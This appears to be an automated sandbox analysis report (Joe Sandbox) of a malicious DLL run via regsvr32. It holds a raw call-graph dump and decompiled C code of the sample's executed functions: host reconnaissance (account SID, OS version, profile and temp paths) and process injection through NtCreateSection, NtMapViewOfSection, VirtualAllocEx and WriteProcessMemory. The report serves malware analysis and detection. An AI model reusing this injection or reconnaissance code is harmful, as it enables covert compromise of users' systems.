12618 10008604 HeapAlloc 12531->12618 12542 100029b1 12532->12542 12534 100031fa 12541 10003204 12534->12541 12619 1000bd10 12534->12619 12536 1000861a 2 API calls 12536->12532 12541->12536 12543 10009e66 3 API calls 12542->12543 12544 100029cf 12543->12544 12628 100028fb 12544->12628 12547 100028fb 3 API calls 12548 100029f8 12547->12548 12632 10009ea5 12548->12632 12591 1000e49a 12590->12591 12592 1000e45e 12590->12592 12593 100095c7 HeapAlloc 12591->12593 12603 10008604 HeapAlloc 12592->12603 12595 1000e4a4 12593->12595 12596 100091a6 HeapAlloc 12595->12596 12597 1000e4b0 12596->12597 12598 100085c2 2 API calls 12597->12598 12600 1000e4bd 12598->12600 12599 1000e46f 12599->12600 12601 1000861a 2 API calls 12599->12601 12600->12496 12602 1000e493 12601->12602 12602->12496 12603->12599 12604->12508 12605->12511 12607 10009854 12606->12607 12608 10009879 12607->12608 12609 1000861a 2 API calls 12607->12609 12608->12515 12609->12608 12610->12519 12612 1000bb37 12611->12612 12613 1000bb56 12612->12613 12614 100095e1 HeapAlloc 12612->12614 12613->12528 12615 1000bb65 lstrcmpiW 12614->12615 12616 1000bb7b 12615->12616 12617 100085d5 2 API calls 12616->12617 12617->12613 12618->12534 12620 1000bd5e 12619->12620 12621 1000bdfe LocalAlloc 12620->12621 12622 10003210 12620->12622 12621->12622 12622->12541 12623 1000bc7a 12622->12623 12624 100095e1 HeapAlloc 12623->12624 12626 1000bca0 12624->12626 12625 100085d5 2 API calls 12627 10003268 12625->12627 12626->12625 12629 1000291c 12628->12629 12630 10002905 12628->12630 12629->12547 12631 10008698 3 API calls 12630->12631 12631->12629 12633 10009f95 3 API calls 12632->12633 12748->11339 12749->11342 12914 1000540e 12919 1000d603 12914->12919 12917 10005423 GetLastError 12918 1000542c 12917->12918 12942 10008604 HeapAlloc 12919->12942 12921 1000d61d 12922 1000541f 12921->12922 12923 100091e3 HeapAlloc 12921->12923 12922->12917 12922->12918 12924 1000d632 12923->12924 12924->12922 12943 1000c3a7 12924->12943 12927 100095e1 
HeapAlloc 12928 1000d652 12927->12928 12929 10009640 2 API calls 12928->12929 12930 1000d667 12929->12930 12931 100085d5 2 API calls 12930->12931 12932 1000d670 12931->12932 12949 1000d44b 12932->12949 12934 1000d67a 12941 1000d683 12934->12941 12956 1000d497 12934->12956 12936 1000861a 2 API calls 12937 1000d720 12936->12937 12938 1000861a 2 API calls 12937->12938 12939 1000d72b 12938->12939 12940 1000861a 2 API calls 12939->12940 12940->12922 12941->12936 12942->12921 12944 1000c3c0 12943->12944 12945 10008698 3 API calls 12944->12945 12947 1000c4c0 12944->12947 12948 1000c43b 12944->12948 12945->12948 12946 1000874f memset 12946->12947 12947->12927 12948->12946 12948->12947 12950 100095e1 HeapAlloc 12949->12950 12951 1000d45a 12950->12951 12969 1000950e 12951->12969 12954 100085d5 2 API calls 12955 1000d46f 12954->12955 12955->12934 12957 100092e5 2 API calls 12956->12957 12958 1000d4b0 CoInitializeEx 12957->12958 12959 100095e1 HeapAlloc 12958->12959 12960 1000d4cb 12959->12960 12961 100095e1 HeapAlloc 12960->12961 12962 1000d4dc 12961->12962 12963 100085d5 2 API calls 12962->12963 12964 1000d4f8 12963->12964 12965 100085d5 2 API calls 12964->12965 12966 1000d50e 12965->12966 12967 1000861a 2 API calls 12966->12967 12968 1000d519 12967->12968 12968->12941 12970 1000902d _ftol2_sse 12969->12970 12971 10009531 12970->12971 12972 100092e5 2 API calls 12971->12972 12973 10009552 12972->12973 12973->12954 12750 10005e96 12751 10005ea6 ExitProcess 12750->12751 13593 1000229a 13594 100022c3 13593->13594 13595 100022ab 13593->13595 13628 10002255 13594->13628 13596 10009749 2 API calls 13595->13596 13598 100022b8 13596->13598 13603 10006aed 13598->13603 13601 100094b7 2 API calls 13602 100022dc 13601->13602 13604 10006b0f 13603->13604 13617 10006b07 13603->13617 13605 1000b4a3 2 API calls 13604->13605 13606 10006b18 13605->13606 13606->13617 13635 1000fccd 13606->13635 13608 10006b2c 13610 1000914f 5 API calls 13608->13610 13625 10006b32 13608->13625 13609 1000861a 2 
API calls 13609->13617 13611 10006b65 13610->13611 13612 100060df 4 API calls 13611->13612 13611->13617 13613 10006b77 13612->13613 13614 10006b84 13613->13614 13615 10006b9c 13613->13615 13616 1000861a 2 API calls 13614->13616 13618 10005886 7 API calls 13615->13618 13627 10006bbc 13615->13627 13616->13617 13617->13594 13619 10006bb8 13618->13619 13622 10009749 2 API calls 13619->13622 13619->13627 13620 1000861a 2 API calls 13621 10006bf0 13620->13621 13623 1000861a 2 API calls 13621->13623 13624 10006bc9 13622->13624 13623->13625 13626 10009f06 4 API calls 13624->13626 13625->13609 13626->13627 13627->13620 13629 1000b4a3 2 API calls 13628->13629 13630 10002266 13629->13630 13631 10002296 13630->13631 13632 10002287 13630->13632 13633 1000a0ab 4 API calls 13630->13633 13631->13601 13634 1000861a 2 API calls 13632->13634 13633->13632 13634->13631 13636 1000fd18 13635->13636 13637 1000fcdc 13635->13637 13643 10008604 HeapAlloc 13636->13643 13638 1000861a 2 API calls 13637->13638 13640 1000fce5 13638->13640 13641 10008669 HeapAlloc 13640->13641 13642 1000fcfc 13640->13642 13641->13642 13642->13608 13643->13640 12752 10001a1b 12753 10001a3c 12752->12753 12754 10001a82 12752->12754 12756 10009ea5 3 API calls 12753->12756 12755 10001aac 12754->12755 12808 1000160d 12754->12808 12761 10001ab4 12755->12761 12771 10001778 12755->12771 12758 10001a44 12756->12758 12760 10009e66 3 API calls 12758->12760 12762 10001a50 12760->12762 12769 10001a6e 12762->12769 12804 100096ca 12762->12804 12763 10001b10 12765 1000861a 2 API calls 12763->12765 12764 1000861a 2 API calls 12764->12754 12765->12761 12767 10001ad7 inet_ntoa lstrcpynA 12768 1000160d 7 API calls 12767->12768 12770 10001ac3 12768->12770 12769->12764 12770->12761 12770->12763 12770->12767 12772 10009f95 3 API calls 12771->12772 12773 100017c0 12772->12773 12774 100017dd 12773->12774 12820 100016ee 12773->12820 12775 1000861a 2 API calls 12774->12775 12777 100017f3 12775->12777 12778 10001080 HeapAlloc 12777->12778 
12779 100017fd 12778->12779 12780 1000a51a 2 API calls 12779->12780 12781 10001818 12780->12781 12782 100085c2 2 API calls 12781->12782 12783 10001826 12782->12783 12784 10001891 12783->12784 12785 10001080 HeapAlloc 12783->12785 12786 10001899 12784->12786 12819 10008604 HeapAlloc 12784->12819 12788 10001835 12785->12788 12786->12770 12789 10008910 3 API calls 12788->12789 12790 10001845 12789->12790 12791 100085c2 2 API calls 12790->12791 12793 10001852 12791->12793 12792 1000861a 2 API calls 12794 100019fa 12792->12794 12795 1000186e 12793->12795 12797 100016ee 3 API calls 12793->12797 12796 1000861a 2 API calls 12794->12796 12798 1000861a 2 API calls 12795->12798 12796->12786 12797->12795 12799 10001887 12798->12799 12800 10008cc0 4 API calls 12799->12800 12800->12784 12801 1001242d _ftol2_sse 12802 100018ac 12801->12802 12802->12801 12803 100019e4 12802->12803 12803->12792 12805 100096d6 12804->12805 12806 100096fb 12805->12806 12807 100096ef memset 12805->12807 12806->12769 12807->12806 12809 1000980c GetSystemTimeAsFileTime 12808->12809 12810 10001628 12809->12810 12811 1000980c GetSystemTimeAsFileTime 12810->12811 12812 10001630 12811->12812 12813 100098ee 6 API calls 12812->12813 12815 10001655 12813->12815 12814 1000165d 12814->12755 12815->12814 12816 1000980c GetSystemTimeAsFileTime 12815->12816 12817 100016a0 12815->12817 12816->12815 12818 1000984a 2 API calls 12817->12818 12818->12814 12819->12802 12821 1000170b 12820->12821 12822 10008698 3 API calls 12821->12822 12823 10001768 12821->12823 12822->12821 12823->12774 13644 1000f69b 13647 10008604 HeapAlloc 13644->13647 13646 1000f6ab 13647->13646 13861 1000131e 13862 10009ea5 3 API calls 13861->13862 13863 10001335 13862->13863 13864 10009e1f 3 API calls 13863->13864 13865 10001341 13864->13865 13866 10001366 13865->13866 13867 1001242d _ftol2_sse 13865->13867 13868 100011e7 4 API calls 13866->13868 13867->13866 13869 1000138f 13868->13869 13870 1000139b 13869->13870 13871 10009ed0 3 API calls 

                                          Executed Functions

                                          Control-flow Graph

                                          C-Code - Quality: 91%
                                          			E1000D01F(void* __fp0) {
                                          				long _v8;
                                          				long _v12;
                                          				union _SID_NAME_USE _v16;
                                          				struct _SYSTEM_INFO _v52;
                                          				char _v180;
                                          				short _v692;
                                          				char _v704;
                                          				char _v2680;
                                          				void* __esi;
                                          				struct _OSVERSIONINFOA* _t81;
                                          				intOrPtr _t83;
                                          				void* _t84;
                                          				long _t86;
                                          				void** _t88;
                                          				intOrPtr _t90;
                                          				intOrPtr _t91;
                                          				intOrPtr _t92;
                                          				intOrPtr _t97;
                                          				void* _t98;
                                          				intOrPtr _t103;
                                          				char* _t105;
                                          				void* _t108;
                                          				intOrPtr _t111;
                                          				long _t115;
                                          				signed int _t117;
                                          				long _t119;
                                          				intOrPtr _t124;
                                          				intOrPtr _t127;
                                          				intOrPtr _t130;
                                          				intOrPtr _t134;
                                          				intOrPtr _t145;
                                          				intOrPtr _t147;
                                          				intOrPtr _t149;
                                          				intOrPtr _t152;
                                          				intOrPtr _t154;
                                          				signed int _t159;
                                          				struct HINSTANCE__* _t162;
                                          				short* _t164;
                                          				intOrPtr _t167;
                                          				WCHAR* _t168;
                                          				char* _t169;
                                          				intOrPtr _t181;
                                          				intOrPtr _t200;
                                          				void* _t215;
                                          				long _t218;
                                          				void* _t219;
                                          				char* _t220;
                                          				struct _OSVERSIONINFOA* _t222;
                                          				void* _t223;
                                          				int* _t224;
                                          				void* _t241;
                                          
                                          				_t241 = __fp0;
                                          				_t162 =  *0x1001e69c; // 0x10000000
                                          				_t81 = E10008604(0x1ac4);
                                          				_t222 = _t81;
                                          				if(_t222 == 0) {
                                          					return _t81;
                                          				}
                                          				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                                          				_t83 =  *0x1001e684; // 0x2e5faa0
                                          				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                                          				_t3 = _t222 + 0x648; // 0x648
                                          				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                                          				_t5 = _t222 + 0x1644; // 0x1644
                                          				_t216 = _t5;
                                          				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                                          				_t227 = _t86;
                                          				if(_t86 != 0) {
                                          					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
                                          				}
                                          				GetCurrentProcess();
                                          				_t88 = E1000BA05(); // executed
                                          				 *(_t222 + 0x110) = _t88;
                                          				_t178 =  *_t88;
                                          				if(E1000BB8D( *_t88) == 0) {
                                          					_t90 = E1000BA62(_t178, _t222); // executed
                                          					__eflags = _t90;
                                          					_t181 = (0 | _t90 > 0x00000000) + 1;
                                          					__eflags = _t181;
                                          					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                                          				} else {
                                          					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                                          				}
                                          				_t12 = _t222 + 0x220; // 0x220, executed
                                          				_t91 = E1000E3F1(_t12); // executed
                                          				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
                                          				_t92 = E1000E3B6(_t12); // executed
                                          				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
                                          				 *(_t222 + 0x224) = _t162;
                                          				_v12 = 0x80;
                                          				_v8 = 0x100;
                                          				_t22 = _t222 + 0x114; // 0x114
                                          				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
                                          					GetLastError();
                                          				}
                                          				_t97 =  *0x1001e694; // 0x2e5fbf8
                                          				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                                          				_t26 = _t222 + 0x228; // 0x228
                                          				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                                          				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                                          				GetLastError();
                                          				_t31 = _t222 + 0x228; // 0x228
                                          				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
                                          				_t34 = _t222 + 0x114; // 0x114, executed
                                          				_t103 = E1000B7A8(_t34,  &_v692);
                                          				_t35 = _t222 + 0xb0; // 0xb0
                                          				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                                          				_push(_t35);
                                          				E1000B67D(_t103, _t35, _t98, _t241);
                                          				_t37 = _t222 + 0xb0; // 0xb0
                                          				_t105 = _t37;
                                          				_t38 = _t222 + 0xd0; // 0xd0
                                          				_t164 = _t38;
                                          				if(_t105 != 0) {
                                          					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                                          					if(_t159 > 0) {
                                          						_t164[_t159] = 0;
                                          					}
                                          				}
                                          				_t41 = _t222 + 0x438; // 0x438
                                          				_t42 = _t222 + 0x228; // 0x228
                                          				E10008FD8(_t42, _t41);
                                          				_t43 = _t222 + 0xb0; // 0xb0
                                          				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
                                          				_t44 = _t222 + 0x100c; // 0x100c
                                          				E1000B88A(_t108, _t44, _t241);
                                          				_t199 = GetCurrentProcess(); // executed
                                          				_t111 = E1000BBDF(_t110); // executed
                                          				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
                                          				memset(_t222, 0, 0x9c);
                                          				_t224 = _t223 + 0xc;
                                          				_t222->dwOSVersionInfoSize = 0x9c;
                                          				GetVersionExA(_t222);
                                          				_t167 =  *0x1001e684; // 0x2e5faa0
                                          				_t115 = 0;
                                          				_v8 = 0;
                                          				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                                          					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                                          					_t115 = _v8;
                                          				}
                                          				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                                          				if(_t115 == 0) {
                                          					GetSystemInfo( &_v52);
                                          					_t117 = _v52.dwOemId & 0x0000ffff;
                                          				} else {
                                          					_t117 = 9;
                                          				}
                                          				_t54 = _t222 + 0x1020; // 0x1020
                                          				_t168 = _t54;
                                          				 *(_t222 + 0x9c) = _t117;
                                          				GetWindowsDirectoryW(_t168, 0x104);
                                          				_t119 = E100095E1(_t199, 0x10c);
                                          				_t200 =  *0x1001e684; // 0x2e5faa0
                                          				_t218 = _t119;
                                          				 *_t224 = 0x104;
                                          				_push( &_v704);
                                          				_push(_t218);
                                          				_v8 = _t218;
                                          				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                                          					_t154 =  *0x1001e684; // 0x2e5faa0
                                          					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                                          				}
                                          				E100085D5( &_v8);
                                          				_t124 =  *0x1001e684; // 0x2e5faa0
                                          				_t61 = _t222 + 0x1434; // 0x1434
                                          				_t219 = _t61;
                                          				 *_t224 = 0x209;
                                          				_push(_t219);
                                          				_push(L"USERPROFILE");
                                          				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                                          					E10009640(_t219, 0x105, L"%s\\%s", _t168);
                                          					_t152 =  *0x1001e684; // 0x2e5faa0
                                          					_t224 =  &(_t224[5]);
                                          					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                                          				}
                                          				_push(0x20a);
                                          				_t64 = _t222 + 0x122a; // 0x122a
                                          				_t169 = L"TEMP";
                                          				_t127 =  *0x1001e684; // 0x2e5faa0
                                          				_push(_t169);
                                          				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                                          					_t149 =  *0x1001e684; // 0x2e5faa0
                                          					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                                          				}
                                          				_push(0x40);
                                          				_t220 = L"SystemDrive";
                                          				_push( &_v180);
                                          				_t130 =  *0x1001e684; // 0x2e5faa0
                                          				_push(_t220);
                                          				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                                          					_t147 =  *0x1001e684; // 0x2e5faa0
                                          					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                                          				}
                                          				_v8 = 0x7f;
                                          				_t72 = _t222 + 0x199c; // 0x199c
                                          				_t134 =  *0x1001e684; // 0x2e5faa0
                                          				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                                          				_t75 = _t222 + 0x100c; // 0x100c
                                          				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
                                          				_t76 = _t222 + 0x1858; // 0x1858
                                          				E100122D3( &_v2680, _t76, 0x20);
                                          				_t79 = _t222 + 0x1878; // 0x1878
                                          				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
                                          				_t145 = E1000CD33(_t79); // executed
                                          				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
                                          				return _t222;
                                          			}

                                          APIs
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                          • GetCurrentProcessId.KERNEL32 ref: 1000D046
                                          • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
                                          • GetCurrentProcess.KERNEL32 ref: 1000D09F
                                          • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
                                          • GetLastError.KERNEL32 ref: 1000D13E
                                          • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
                                          • GetLastError.KERNEL32 ref: 1000D172
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
                                          • GetCurrentProcess.KERNEL32 ref: 1000D20E
                                            • Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                                          • memset.MSVCRT ref: 1000D229
                                          • GetVersionExA.KERNEL32(00000000), ref: 1000D234
                                          • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
                                          • GetSystemInfo.KERNEL32(?), ref: 1000D26A
                                          • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsmemset
                                          • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                          • API String ID: 1475707489-2706916422
                                          • Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                                          • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
                                          • Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                                          • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 86%
                                          			E1000C6C0(void* __ecx, intOrPtr __edx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				long _v24;
                                          				long _v28;
                                          				void* _v32;
                                          				intOrPtr _v36;
                                          				long _v40;
                                          				void* _v44;
                                          				char _v56;
                                          				char _v72;
                                          				struct _WNDCLASSEXA _v120;
                                          				void* _t69;
                                          				intOrPtr _t75;
                                          				struct HWND__* _t106;
                                          				intOrPtr* _t113;
                                          				struct _EXCEPTION_RECORD _t116;
                                          				void* _t126;
                                          				void* _t131;
                                          				intOrPtr _t134;
                                          				void* _t140;
                                          				void* _t141;
                                          
                                          				_t69 =  *0x1001e688; // 0x2de0590
                                          				_t126 = __ecx;
                                          				_t134 = __edx;
                                          				_t116 = 0;
                                          				_v36 = __edx;
                                          				_v16 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				_v24 = 0;
                                          				_v20 = __ecx;
                                          				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                                          					E1000E23E(0x1f4);
                                          					_t116 = 0;
                                          				}
                                          				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                          				_v28 = _t116;
                                          				if( *_t113 != 0x4550) {
                                          					L12:
                                          					if(_v8 != 0) {
                                          						_t75 =  *0x1001e780; // 0x2e5fbc8
                                          						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                                          						_v8 = _v8 & 0x00000000;
                                          					}
                                          					L14:
                                          					if(_v12 != 0) {
                                          						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
                                          					}
                                          					if(_v16 != 0) {
                                          						NtClose(_v16);
                                          					}
                                          					return _v8;
                                          				}
                                          				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                                          				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
                                          					goto L12;
                                          				}
                                          				_v120.style = 0xb;
                                          				_v120.cbSize = 0x30;
                                          				_v120.lpszClassName =  &_v56;
                                          				asm("movsd");
                                          				_v120.lpfnWndProc = DefWindowProcA;
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsb");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsw");
                                          				asm("movsb");
                                          				_v120.cbWndExtra = 0;
                                          				_v120.lpszMenuName = 0;
                                          				_v120.cbClsExtra = 0;
                                          				_v120.hInstance = 0;
                                          				if(RegisterClassExA( &_v120) != 0) {
                                          					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
                                          					if(_t106 != 0) {
                                          						DestroyWindow(_t106); // executed
                                          						UnregisterClassA( &_v56, 0);
                                          					}
                                          				}
                                          				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                                          					_t126 = _v20;
                                          					goto L12;
                                          				} else {
                                          					_t126 = _v20;
                                          					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                                          						goto L12;
                                          					}
                                          					_t140 = E10008669( *0x1001e688, 0x1ac4);
                                          					_v32 = _t140;
                                          					if(_t140 == 0) {
                                          						goto L12;
                                          					}
                                          					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                                          					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
                                          					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
                                          					E1000861A( &_v32, 0x1ac4);
                                          					_t141 =  *0x1001e688; // 0x2de0590
                                          					 *0x1001e688 = _t131;
                                          					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                                          					E1000C63F(_v12, _v8, _v36);
                                          					 *0x1001e688 = _t141;
                                          					goto L14;
                                          				}
                                          			}



























                                          APIs
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                                          • RegisterClassExA.USER32 ref: 1000C785
                                          • CreateWindowExA.USER32 ref: 1000C7B0
                                          • DestroyWindow.USER32 ref: 1000C7BB
                                          • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
                                          • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
                                          • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
                                          • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
                                            • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                          • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
                                          • NtClose.NTDLL(00000000), ref: 1000C8F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                                          • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                          • API String ID: 2002808388-2319545179
                                          • Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                                          • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
                                          • Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                                          • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 82%
                                          			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                                          				long _v8;
                                          				char _v16;
                                          				short _v144;
                                          				short _v664;
                                          				void* _t19;
                                          				struct HINSTANCE__* _t22;
                                          				long _t23;
                                          				long _t24;
                                          				char* _t27;
                                          				WCHAR* _t32;
                                          				long _t33;
                                          				void* _t38;
                                          				void* _t49;
                                          				struct _SECURITY_ATTRIBUTES* _t53;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				void* _t57;
                                          
                                          				_t49 = __edx;
                                          				OutputDebugStringA("Hello qqq"); // executed
                                          				if(_a8 != 1) {
                                          					if(_a8 != 0) {
                                          						L12:
                                          						return 1;
                                          					}
                                          					SetLastError(0xaa);
                                          					L10:
                                          					return 0;
                                          				}
                                          				E100085EF();
                                          				_t19 = E1000980C( &_v16);
                                          				_t57 = _t49;
                                          				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                                          					goto L12;
                                          				} else {
                                          					E10008F78();
                                          					GetModuleHandleA(0);
                                          					_t22 = _a4;
                                          					 *0x1001e69c = _t22;
                                          					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                                          					_t24 = GetLastError();
                                          					if(_t23 != 0 && _t24 != 0x7a) {
                                          						memset( &_v144, 0, 0x80);
                                          						_t55 = _t54 + 0xc;
                                          						_t53 = 0;
                                          						do {
                                          							_t27 = E100095C7(_t53);
                                          							_a8 = _t27;
                                          							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                                          							E100085C2( &_a8);
                                          							_t53 =  &(_t53->nLength);
                                          						} while (_t53 < 0x2710);
                                          						E10012A5B( *0x1001e69c);
                                          						 *_t55 = 0x7c3;
                                          						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
                                          						 *_t55 = 0xb4e;
                                          						_t32 = E100095E1(0x1001ba28);
                                          						_a8 = _t32;
                                          						_t33 = GetFileAttributesW(_t32); // executed
                                          						_push( &_a8);
                                          						if(_t33 == 0xffffffff) {
                                          							E100085D5();
                                          							_v8 = 0;
                                          							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
                                          							 *0x1001e6a8 = _t38;
                                          							if(_t38 == 0) {
                                          								goto L10;
                                          							}
                                          							goto L12;
                                          						}
                                          						E100085D5();
                                          					}
                                          					goto L10;
                                          				}
                                          			}





















                                          APIs
                                          • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
                                          • SetLastError.KERNEL32(000000AA), ref: 100060D7
                                            • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                                            • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                                            • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
                                          • GetLastError.KERNEL32 ref: 10005FEF
                                          • memset.MSVCRT ref: 10006013
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
                                          • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                                          • String ID: Hello qqq
                                          • API String ID: 3435743081-3610097158
                                          • Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
